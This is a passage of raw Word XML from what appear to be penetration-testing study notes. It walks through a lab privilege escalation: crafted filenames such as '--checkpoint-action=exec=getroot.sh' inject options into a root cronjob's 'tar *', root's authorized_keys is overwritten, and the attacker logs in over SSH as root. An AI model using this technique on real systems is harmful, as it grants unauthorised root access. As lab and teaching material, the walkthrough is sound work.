    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E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ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Setting up the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now they craft filenames that abuse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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These filenames are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> themselves. But when passed to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they are interpreted as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells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to trigger an action every 1 record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells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to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on each checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Because these "filenames" are part of the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wildcard in the tar command, they get executed as part of the root-run cronjob.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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5F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Letting the Cronjob Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They wait a few minutes for cron to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When it runs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It includes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint=1</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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pP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interprets those as real options, not filenames, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. SSH in as Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025FF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that the root's authorized_keys file has been overwritten with alfredo's public key, the attacker can SSH as root without needing the root password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002600">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -p 25022 -i id_alfredo root@192.168.56.101</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002601">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They use the private key corresponding to the public key added earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002602">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once in, they have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root shell access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002603">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[root@amaterasu ~]# cat proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002604">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002605">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of Flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found a root cronjob running a script using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crafted malicious filenames (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint=1</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--checkpoint-action=exec=getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> would interpret as options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002608">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Created </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to overwrite root's authorized_keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Waited for cron to run the backup script as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH'd in as root using the now-added public key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let me know if you'd like a diagram or want to test this in a lab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ti2o9p87ftwp" w:id="331"/>
      <w:bookmarkEnd w:id="331"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples of files ran by cron jobs (to help build intuition for identifying them)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000260F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002610">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="901700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="233" name="image228.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image228.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId801"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2611">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId802">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
